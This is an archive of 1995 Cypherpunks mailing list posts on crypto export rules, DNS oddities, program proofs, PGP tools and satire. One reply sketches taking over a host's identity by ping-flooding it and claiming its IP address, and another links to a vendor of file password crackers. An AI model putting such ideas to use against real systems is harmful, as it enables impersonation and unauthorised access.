Date: Mon, 7 Aug 95 18:14:38 PDT
To: shamrock@netcom.com
Subject: Re: Where to find Internet growth stats?
In-Reply-To: <v02120d06ac4c6bfa9939@[192.0.2.1]>
Message-ID: <199508080113.SAA00900@knee.twinsun.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.isoc.org/

also

gopher://akasha.ti.com:70/11/matrix/growth/internet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Mon, 7 Aug 95 16:09:46 PDT
To: cypherpunks@toad.com
Subject: Two-faced Security Problem? Dammit Janus?
Message-ID: <ac4c4b91000210041ba1@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Not exactly crypto, but the same idea:

I've been trying to hook up an HTTP server sitting on a Mac at the end of
my normal PPP connection. This was just supposed to be a test, but I kept
getting annoying connection problems whenever someone tried to GET a page
from me. The connection wouldn't go through about half of the time.

After poking around for a week, I discovered that my home machine,
newray.digex.net, is listed in the Digex's nameservers TWICE! Once with the
IP address that my home machine is waiting for (199.125.128.5) and once
with some other IP address in the digex space (164.109.211.61). If you do
an nslookup on the name, you get both addresses. I believe that the
technically correct thing for someone to do is to choose one of the
addresses at random to distribute the load between two machines pretending
to be one. This explains the connection failures that happened half of the
time.

This has led me to wonder, though, whether this is some sort of security
breech. For instance, could there be someone out there mascarading as me?
Normally I run Eudora, Netscape, Telnet and other outward bound
applications. It was almost a fluke that I noticed that there were two
entries.

Does some software need to find its IP address in a DNS table? For
instance, does Eudora need to look up  164.109.211.61 to find
"newray.digex.net"? If someone was using this software on the mascarading
node, they would need to set up an entry in the tables to make everything
work. They just assumed I would never get inbound traffic.

Any theories on this?

-Peter "More Paranoid Than Ever" Wayner






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Mon, 7 Aug 95 16:27:13 PDT
To: cypherpunks@toad.com
Subject: patent info URL
Message-ID: <v02120d06ac4c5f187191@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


Since various intellectual property debates and questions come up
("plague") periodically, it seemed like it'd be a good idea to post the
following URL:

        http://www.patents.com/

Its run by a small patent law firm and has a series of well-linked, snappy
FAQs on issues pertaining to intellectual property, patents (including some
on "I had a really clever idea--what should[n't] I do?"), relevant links,
etc. etc

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Mon, 7 Aug 95 19:05:21 PDT
To: cypherpunks@toad.com
Subject: See y'all in a while....
Message-ID: <199508080200.AA08748@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain




I'm leaving the list for a while while I try to work out a different
way of accessing the net. In short, I've grown dissatisfied with my
ISP and need some time to think things through before making other
arrangements. It's too frustrating sorting through all of this mail
without proper filtering scripts like I had set up back at srl03.

And news is kind-of beside the point: the news server is always
full, and rejects any attempt to post because of lack of space.

In the meantime, while y'all discuss all that stuff about logical
proofs and the like, please, _please_, stay away from crosswalks?

I'll probably make another attempt at downloading pgp262s.zip before
I shut this down... the first two times the modem (I think theirs)
went flaky and dropped the connection on me.

Okay. time to see if the signature service works. Later, dudes.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBwQDCoTheIowlstareqnot8whaththeyEseemMI5rculIym8xjzYV8C
mErjcooperUcoopermcooperqBviplMp
=aBGi
-----END PGP SIGNATURE-----

+----------------+Quote from _Infinite In All Directions_, F.J. Dyson-----+
| Phil Fraering / \"The English Hierarchy, if there be anything unsound in|
| pgf@tyrell.net\ /its constitution, has reason to tremble even at an air |
+----------------+-pump or an electrical machine."---Joseph Priestly------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 7 Aug 95 18:39:44 PDT
To: cypherpunks@toad.com
Subject: 700_dig
Message-ID: <199508080139.VAA01367@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   MH has provided a transcript of Pat Robertson's show on
   digital cash of March 8, 1995. It includes remarks by David
   Chaum, Dave Banisar, Steven Levy and others.


   700_dig (about 14K)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 7 Aug 95 18:41:46 PDT
To: cypherpunks@toad.com
Subject: WDM_zum
Message-ID: <199508080141.VAA01570@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   RH has provided an informative article on wavelength
   division multiplexing (WDM) from the August 7 InfoWorld:

   "Boost in optical-fiber communication capacity is just over
   the rainbow," by Bob Metcalfe, the founder of 3Com.


   WDM_zum (about 5K)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dochobbs@wwa.com (Michael D. Hobbs)
Date: Mon, 7 Aug 95 19:50:49 PDT
To: Matt Miszewski <sunder@escape.com>
Subject: Re: MS Money password problem
Message-ID: <m0sfek8-000FUrC@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm not sure if this has been mentioned or will help, but this
company makes crakers for quicken, word and wordperfect (not
sure about M$ money though).

http://gn2.getnet.com:80/crak/
email: johnk@indirect.com
_____________________________________________________________
dochobbs@wwa.com	M.D. Hobbs	mhobbs@rad.rpslmc.edu
http://miso.wwa.com/~dochobbs		finger for my pgp key
I am human and nothing human do I count alien.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brendan@Mail.RAth.PeachNet.EDU (Brendan Mullen)
Date: Mon, 7 Aug 95 20:30:53 PDT
To: cypherpunks@toad.com
Subject: Re: Where to find Internet growth stats?
Message-ID: <v02130501ac4c8965a56e@[168.24.241.128]>
MIME-Version: 1.0
Content-Type: text/plain


http://www.tic.com/mids/midshome.html
is  --cut->>Matrix Information and Directory Services, Inc. (MIDS) is a
corporation founded by

      Smoot Carl-Mitchell
      and John S. Quarterman.
      Eric McKinney is Assistant Editor.  <<--paste-


---
Brendan Mullen  brendan@chugalug.cosmic.uga.edu
Athens GA USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 7 Aug 95 20:12:42 PDT
To: cypherpunks@toad.com
Subject: RSA Catalog
Message-ID: <199508080312.XAA14393@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


For those who've not yet fondled RSA's sleek "Security 
Solutions Catalog," it can be virtually diddled at:


http://www.rsa.com/rsa/sscatw95/P67.HTM







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Mon, 7 Aug 95 20:28:55 PDT
To: Goh Seow Hiong <shgoh@ncb.gov.sg>
Subject: Re: Triple-DES controlled?
In-Reply-To: <Pine.3.89.9508080916.G1185-0100000@gallery.ncb.gov.sg>
Message-ID: <199508080328.XAA24362@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Goh Seow Hiong writes:
> Could someone confirm whether the US export restrictions apply to 
> Triple-DES?

Yes.

> If so, are there exceptions as in the case of DES (e.g. for 
> banking or financial applications).

I have not heard of export licenses being granted for 3DES.

However, why do you care? As a person from a reasonably free country
you can just get the DES code from Finland or any one of dozens of
other sites outside the US.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 7 Aug 95 21:03:16 PDT
To: perry@piermont.com
Subject: Re: Triple-DES controlled?
Message-ID: <9508080402.AA02918@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>I have not heard of export licenses being granted for 3DES.

Didn't the ANSI financial committee just adopt 3DES (over NSA
objections)?  Presumably they consider the export situation solved/solvable.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Mon, 7 Aug 95 21:09:14 PDT
To: dochobbs@wwa.com
Subject: Re: www remailer interface
Message-ID: <199508080404.AAA02398@interport.net>
MIME-Version: 1.0
Content-Type: text/plain



> 1. removing the hardwired

> 2. removing the hardwired and forcing you to chain

> 3. keep the hardwired in and use some 'established' remailer
> or one the group can come to a consensus on.

  Given the second possibility, I see no reason to hardwire a
remailer.  It really will make people suspicious!  I can easily
imagine someone deciding not to use that remailer again, just
on general principles.

  And anyway, chaining is not always necessary, especially if
the sender is at a public Web terminal or using an anonymous Web
proxy.  The remailers don't enforce chaining, why should you?


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Mon, 7 Aug 95 21:07:22 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Triple-DES controlled?
In-Reply-To: <9508080402.AA02918@sulphur.osf.org>
Message-ID: <199508080407.AAA09263@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> >I have not heard of export licenses being granted for 3DES.
> 
> Didn't the ANSI financial committee just adopt 3DES (over NSA
> objections)?

Yes.

> Presumably they consider the export situation solved/solvable.

There is the trivial solution of buying outside the US. The hardware
is actually better these days as the Germans and others have a
worldwide market and the economies that brings.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 8 Aug 95 00:37:08 PDT
To: perry@piermont.com
Subject: Re: Triple-DES controlled?
Message-ID: <199508080734.AAA17572@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Didn't the ANSI financial committee just adopt 3DES (over NSA
>> objections)?
>> Presumably they consider the export situation solved/solvable.

>There is the trivial solution of buying outside the US. The hardware
>is actually better these days as the Germans and others have a
>worldwide market and the economies that brings.

Also. the ITAR rules give banks and financial institutions Extra Slack for
exporting
crypto gear for their own use.  In some ways that makes sense (electronic bank
robbery could be a very profitable business, and bankers are politically
influential),
and yet some of the government's biggest objections to free crypto seems to be
that it allows people to have financial privacy...
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Mon, 7 Aug 95 16:32:27 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: MS Money password problem
In-Reply-To: <Pine.BSD/.3.91.950807160839.11218R-100000@escape.com>
Message-ID: <Pine.3.89.9508080050.C19886-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Aug 1995, Ray Arachelian wrote:

> Welp, good luck to you.  Of course, this should be a great huge reminder 
> of why BACKUPS are important.  If you have a backup of the data >BEFORE< 
> she locked it, you only lost anything entered from between the date of 
> the backup and "today."

Nope.  the backups are just as protected.  Granted I doubt it is anything 
but trivial, but i do have a regular job and every hour i spend getting 
this password is a billable hour gone...

> =================================================================93=======
>  + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
>   \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
> <--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
>   /|\  |    Just Say     |                                 |----\  /---- | 
>  + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
> =======/---------------------------------------------------------VI------/

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 7 Aug 95 22:49:11 PDT
To: hallam@w3.org
Subject: Re: Quibbling about definitions of "proof"
In-Reply-To: <9508071521.AA10100@zorch.w3.org>
Message-ID: <Pine.3.89.9508080041.F11342-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 7 Aug 1995 hallam@w3.org wrote:

> 
> The requirement for "prooving" a program is thus significantly less onerous than 
> asserted. It is not necessary to provide a trancendental proof, merely to 
> establish consistency with respect to a commonly accepted set of axioms.
> 
> 
> 	Phill Hallam-Baker
> 

Is THAT all?  But I didn't know we could establish consistency of these 
commonly accepted axioms with THEMSELVES!  (By commonly accepted, I mean 
ZF.  I'll even the choice & continuum hypotheses out.)

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Mon, 7 Aug 95 22:00:13 PDT
To: cypherpunks@toad.com
Subject: [Meaningless] Vote.
Message-ID: <199508080457.AAA03322@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Fellow Cypherpunks:

Below is the URL of an "Online Forum" page to allow 
'Net citizens vote on various, (usually boring) issues.

>**************************************************
>    VOTELINK brings the Voice of the Internet
> To today's hot news topics. To make your voice 
>       "heard round the world" go to:
>
>           http://www.votelink.com 
>***************************************************

So last week I was surfin', wastin' time, and drinkin'
a brew, and I happened by. I was asked to vote on some
mundane topic [I forget what]--and instead I suggested
a "World Vote" topic I liked better, and, sure enough,
they put it up this week: [I was shocked when they e-
mailed me!]
:-)

>Should Phil Zimmermann be prosecuted for allowing
>     release of his PGP encryption program on the
>                   Internet? 
>                                                                           
>
>  PRO: ITAR export restrictions exist.
>  Cryptographic software, like PGP, is
>  considered a weapon of war. -- more
[somebody shoot me with PGP, and nothing else!]
>
>  CON: Imprisoning Zimmermann for export
>  violations would be an unconstitutional restraint of
>  free speech and privacy rights. -- more
[guess how Jim Ray voted...] ;-)

       OK. Far be it from me to suggest vote fraud
[there aren't too many Libertarians in cemetaries
anyway :)] but I think certain cypherpunks might
want to go "vote" this week, if you have the time
to waste.

Please vote *only* once, and tell all your buddies.
Thanks.
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMCbswG1lp8bpvW01AQGDeAP8DZiWwIsABi7sy3MuyZo5QMFB/lf0ghIg
8zcE/WGaPocvwqlxwBW3DckSQw/vM8cqyv3LGPjQwC2il5HpELdyS44Rd4tQ/Qjb
p0P+6mZh0Qk8domUuadX877Lk8hcnh7ydypCL3WPigSvh3tYYGwnL00Q6vi6nKzj
YQ7092OOn80=
=ebKB
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCbtzyoZzwIn1bdtAQHUowGA1pSgF1+AVBDi0Jz8H7dd4XIvbXNulPvF
SIRzwHrNMApJoz2mX34r+8hndI3nwREW
=hz/N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Mon, 7 Aug 95 22:59:33 PDT
To: cypherpunks@toad.com
Subject: Parental Advisory
Message-ID: <199508080603.BAA08535@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Just wanted to let folks know that I'm able to confirm that He is still
monitoring the list. Got a response to my posting about my Web page :-/

I hope others will stop by and check it out - links to it welcome.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Tue, 8 Aug 95 07:35:54 PDT
To: cypherpunks@toad.com
Subject: Announce: Private Idaho 2.5 beta
Message-ID: <199508081435.HAA14596@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


The 2.5 beta version of Private Idaho is now available from:

http://www.eskimo.com/~joelm

or

ftp.eskimo.com /u/j/joelm/pidho25b.zip

After I'm satisfied it is relatively bug free, it will be announced to the appropriate newgroups and placed on mirror sites.

Significant enhancements include:

   send SMTP mail directly from Private Idaho
   attach sigs
   conventional PGP encryption option
   anonymous USENET posting through supporting remailers
   improved multi-key interface

The final release will also have full Windows-style help as well as an automated installation program.

This is my first venture into writing TCP/IP - Windows Sockets code.  The SMTP routines seem to work with my ISP, but we'll see what happens on other mail servers.  Coming attractions - once I determine the TCP/IP code is stable, I plan on implementing POP3 background checking for PGP messages.

As usual, comments, questions, and bugs to:

joelm@eskimo.com

----------------------
Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Tue, 8 Aug 95 08:13:14 PDT
To: cypherpunks@toad.com
Subject: Announce: Private Idaho 2.5 beta (addendum)
Message-ID: <199508081513.IAA21067@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, up all night coding, and forgot to briefly describe what Private Idaho is:

Private Idaho is a freeware, Windows frontend to PGP and the anonymous remailers.  It provides a simple, easy to use interface for encrypting and decrypting messages as well as preparing messages to send through remailers.  Although quite usable by crypto-novices, there are a number of advanced features for more experienced users.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Brenton" <Chris.Brenton@newsedge.com>
Date: Tue, 8 Aug 95 05:34:34 PDT
To: <cypherpunks@toad.com>
Subject: Re: Two-faced Security Problem? Dammit Janus?
Message-ID: <9508080837.AA16436@herne.newsedge.com>
MIME-Version: 1.0
Content-Type: text/plain


In reply to:
>
>
>After poking around for a week, I discovered that my home machine,
>newray.digex.net, is listed in the Digex's nameservers TWICE! Once with
the
>IP address that my home machine is waiting for (199.125.128.5) and once
>with some other IP address in the digex space (164.109.211.61). If you do
>an
nslookup on the name, you get both addresses. I believe that the
>technically correct thing for someone to do is to choose one of the
>addresses at random to distribute the load between two machines pretending
>to
be one. This explains the connection failures that happened half of the
>time.
>
>This has led me to wonder, though, whether this is some sort of
security
>breech. For instance, could there be someone out there mascarading as
me?
>Normally I run Eudora, Netscape, Telnet and other outward bound
>applications. It was almost a fluke that I noticed that there were two
>entries.
>

More likely this is a matter of someone assigning a host name to a system
without realizing it has already been taken. Yes it can be a security breech but
as you experienced the connection is broken easily. If someone wanted to grab
your identity they would more likely busy your system (by flooding you with ping
requests or something similar) and then grab you IP address.

>Does some software need to find its IP address in a DNS table? For
>instance, does Eudora need to look up  164.109.211.61 to find
>"newray.digex.net"? 

The lookup typically goes the other way around, from host--->IP address.
Dependant on the cache hits either address could be returned.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Tue, 8 Aug 95 05:48:32 PDT
To: cypherpunks@toad.com
Subject: proving programs correct
Message-ID: <199508081248.IAA11447@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



A boss of mine at Bellcore, and a very smart guy (B. Gopinath) once
mentioned to me that (with the exception of scheme) he'd never seen a
set of formal semantics for a language that were smaller than the
largest program one would care to write in the language. He was, of
course, slightly exagerating for effect, but his point was very
simple: you can't even get the basis on which to write your proofs
right.

An interesting experience happened during the same project, as I
recall: we attempted to prove a small bit of code correct.
Unfortunately, the proof had a bug in it which meshed nicely with a
bug in the program and a bug in the implementation. Proofs are no less
large complicated formal constructs than programs are, and checking
them is no less onerous, unless they are written in formal logic in
which case they are not possible for human beings to produce.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 8 Aug 95 01:35:46 PDT
To: jschultz@coins0.coin.missouri.edu (John Schultz)
Subject: Re: RSA/Perl Shirts
Message-ID: <10803.9508080834@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



John Schultz <jschultz@coins0.coin.missouri.edu> writes on cpunks:
> On Mon, 7 Aug 1995, Rev. Ben wrote:
> > Has Joel Furr shipped his shirts yet?
> > 
> > I see some people on the list have gotten shirts and i was wondering as 
> > I still have not gotten mine.
> 
> I was wondering the same thing myself.  I know my check was cashed over a 
> month ago, but no shirt has arrived.

There are 2 (well 4 actually) suppliers of shirts:

1) (US/Canada) Joel Furr at Josh Osborne's instigation (no current offer,
   but still to send out shirts from first batch)  OFFER PASSED

2) (free world :-) Me - Adam Back <aba@dcs.ex.ac.uk>
   http://dcs.ex.ac.uk/~aba/rsa UK printing cost only - still taking orders
   1st batch will be ordered RSN

3) (US/Canada) Don Henson <dhenson@itsnet.com> http://colossus.net/wepinsto/
   25% of proceeds to Phil Z legal defense fund - 1st batch shipped, taking
   orders next batch

4) (AU region of free world) Lucy Chubb <lucyc@suite.sw.oz.au>
   (no WWW URL yet) will soon be printing some in Australia cost only also
   send her email for status, starting soon

The last I heard about the status of Joel's shirts was on the netstuff
mailing list, some time ago, he said there had been delays due to
various reasons, and that his shirst wouldn't be ready until end July.
As July has ended, I'm presuming this will be RSN.

The people who have their shirts are those who ordered through Don
Henson, who has proceeded very quickly to ship shirts, he was the
start of the 350 ordered thread.

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Goh Seow Hiong <shgoh@ncb.gov.sg>
Date: Mon, 7 Aug 95 18:39:13 PDT
To: cypherpunks@toad.com
Subject: Triple-DES controlled?
Message-ID: <Pine.3.89.9508080916.G1185-0100000@gallery.ncb.gov.sg>
MIME-Version: 1.0
Content-Type: text/plain



Could someone confirm whether the US export restrictions apply to 
Triple-DES?  If so, are there exceptions as in the case of DES (e.g. for 
banking or financial applications).

Thx.


SH




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 8 Aug 95 07:04:43 PDT
To: tcmay@go.net (Timothy C. May)
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <199508081404.KAA15440@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 AM 8/2/95 -0700, Timothy C. May wrote:

>So, hearing that "Pat Robertson is warning against a digital cash society"
>is not too worrisome to me. I suspect he means the stuff about Big Brother
>tracking us and the Number of the Beast, and so on.

Correct.  I have in my hot little hands a book called "Racing Toward the
Mark of the Beast -- Your Money, Computers, and the End of the World" by
Peter & Paul Lalonde (hosts of "This Week in Bible Prophecy") published by
Harvest House.  

They relate the story of their attendance at 1993's "Solutions for the
Global Frontier" card technology conference in Washington, DC which happened
to be held during the Waco Inferno.  "This Week in Bible Prophecy" and CNN
were the only electronic media represented.  Waco encouraged discussion by
the participants for electronic tracking of cult members.

The book hits all the high points of privacy invading technology.  But has
nothing about our sorts of privacy techniques presumably because we are not
yet well known in the Christian community.  

Chapters:

1.  Boy, Have I Got Your Number
2.  Kiss Your Cash Goodby
3.  What's in the Cards?
4.  Your Body:  The Only ID You'll Ever Need
5.  Will That Be Hand or Forehead?
6.  If You're Not Paranoid, It's Because You're Not Paying Close Enough
Attention
7.  Bringing the World On-Line
8.  666:  The System Is Born
9.  The Chosen Generation
10. Where Will You Stand?

I have generally found "Fundies" to be better informed about privacy
problems and more protective of their own privacy than any other discrete group.

DCF

"60 million job changes per year + Federal Job Licensing (The Jordan
Commission proposal to require employers to verify SS#'s) + the 25% error
rate in the SS#-Name database = 15 million legally unemployable for a total
unemployment rate of 18%."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 8 Aug 95 07:42:59 PDT
To: rsalz@osf.org (Rich Salz)
Subject: Re: Triple-DES controlled?
In-Reply-To: <9508080402.AA02918@sulphur.osf.org>
Message-ID: <199508081423.KAA27453@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Didn't the ANSI financial committee just adopt 3DES (over NSA
| objections)?  Presumably they consider the export situation solved/solvable.
| 	/r$

As Perry points out, they consider it solved, albeit to the detriment
of the US infosec industry.  One would hope those companies are
complaining loudly to their congressmen.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Tue, 8 Aug 95 07:55:58 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Triple-DES controlled?
In-Reply-To: <199508081423.KAA27453@bwh.harvard.edu>
Message-ID: <199508081455.KAA00442@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 
> | Didn't the ANSI financial committee just adopt 3DES (over NSA
> | objections)?  Presumably they consider the export situation solved/solvable




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 8 Aug 95 08:37:19 PDT
To: Rich Salz <cypherpunks@toad.com
Subject: Re: Triple-DES controlled?
In-Reply-To: <9508080402.AA02918@sulphur.osf.org>
Message-ID: <9508081531.AA20316@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>>I have not heard of export licenses being granted for 3DES.

>Didn't the ANSI financial committee just adopt 3DES (over NSA
>objections)?  Presumably they consider the export situation solved/solvable.

There is absolutely no difficulty obtaining cryptographic aparatus outside the 
US. I had an entire distribution of PEM and X500 that was entirely written 
outside the US.

DES is avaliable from many sources, there are many tripple DES products 
avaliable.

It is not impossible to get export licenses, there have been several issued for 
DES for financial applications.

If the US wants to be cut out of the market for financial services software 
thats up to them. Non US citizens can write crypto code as well, the British 
crypto tradition is far longer than the US one for example.

	Phill








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 8 Aug 95 11:43:35 PDT
To: cypherpunks@toad.com
Subject: internet reporter's guide
Message-ID: <199508081841.LAA19302@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


a charming tongue-in-cheek "reporter's guide to the internet". 
pass along to your favorite clueless reporter writing
about the information superduperhighway. don't recall seeing
it posted here, but was written by a past cypherpunk contributer...
Gutmann is also acknowledged by PRZ as putting in major amounts
of work into PGP..


------- Forwarded Message

From: pgut01@cs.auckland.ac.nz (Peter Gutmann)
Newsgroups: alt.censorship,alt.internet.media-coverage,comp.org.eff.talk
Subject: The Internet: A short guide for reporters and journalists
Date: 6 Aug 1995 12:32:53 GMT




[The following was originally posted to the nz.general newsgroup in mid-June.
 Two papers/magazines expressed vague interest in publishing it, but I haven't
 heard from them since, for reasons which may become obvious when you read
 this.  If anyone wants to publish this anywhere (Time Magazine, for example
 :-), feel free to do so.  One NZ-specific thing you may need to know is that
 Trevor "I don't give a shit about your network" Rogers is our version of
 Senator Exon who predates Exon by about 6 months and is considerably more
 clueless (and foul-mouthed) than Exon.  You can find some of his more
 notorious quotes in the EFF quote collection]
 
 
                               THE INTERNET
 
                 A short guide for reporters and journalists
 
Recently there have been a lot of reports about a generally insignificant
aspect of the Internet, namely the availability of erotica and other
information via computer.  The reason for this is quite obvious - this is one
of the hottest news topics currently available.  People get upset, tempers
fray, and Trevor Rogers gets to have his face in the paper again.  In short,
stories about the evil Internet are "in".
 
This document is intended as a guide for those who would like to join the ranks
of the other reporters and journalists who have been so successful in the past
when reporting about the Internet.  It is intended to save you the hassle of
having to reinvent the wheel when you prepare your report, and to familiarise
you with certain conventions which need to be followed when reporting on
anything to do with the net.  You'll be amazed at how simple it is.
 
 
WHY REPORTING ABOUT THE INTERNET IS USEFUL
 
The Internet provides fascinating subject material for reporters.  There's no
need to perform any research, you get to cover a "hot topic", and the message
is so simple that even politicians can understand it (or at least know how to
make political gain from it).
 
- - THE MESSAGE
 
  All successful stories on the Internet are based on the following fact:
 
    The Internet is a piece of high-technology whose single goal is to get porn
    and bomb recipes into the hands of children.
 
  Don't worry about the details.  As will shortly be shown, you may have to
  adapt this message slightly for your target audience.  However, since your
  average reader won't really know the difference between the Internet, a
  dialup BBS, and a standalone computer, you don't need to go to any special
  effort to distinguish between these very different technologies.  Generalise.
  If something applies to one area, it applies to all areas, whether that's
  physically possible or not.  The message is the same, and provided people
  read/watch/listen to it, you know you've done your job.
 
- - PORN
 
  Even while you were still at journalism school, you learned that sex sells.
